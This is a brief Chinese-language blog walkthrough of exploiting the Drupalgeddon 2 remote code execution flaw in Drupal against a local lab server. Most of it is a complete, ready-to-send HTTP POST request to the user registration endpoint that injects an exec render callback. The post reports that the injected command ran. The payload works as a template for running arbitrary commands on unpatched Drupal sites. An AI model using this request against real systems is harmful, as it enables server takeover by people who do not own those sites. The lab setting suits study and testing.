Drupal Drupalgeddon 2 远程代码执行漏洞

Created at 2019-07-05 Updated at 2019-08-15 Category 漏洞渗透 Tag Drupal Drupalgeddon 2 远程代码执行漏洞

Drupal Drupalgeddon 2 远程代码执行漏洞

1.访问http://192.168.199.105:8080/看到以下页面,然后用burp抓包。
mAfsWn.png

2.抓到包改变请求
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.199.105:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

mAfoWR.png
成功执行代码,这个代码最终执行了id命令

mAfqOK.png

Table of Content

  1. Drupal Drupalgeddon 2 远程代码执行漏洞
Site by csy using Hexo & Random

Hide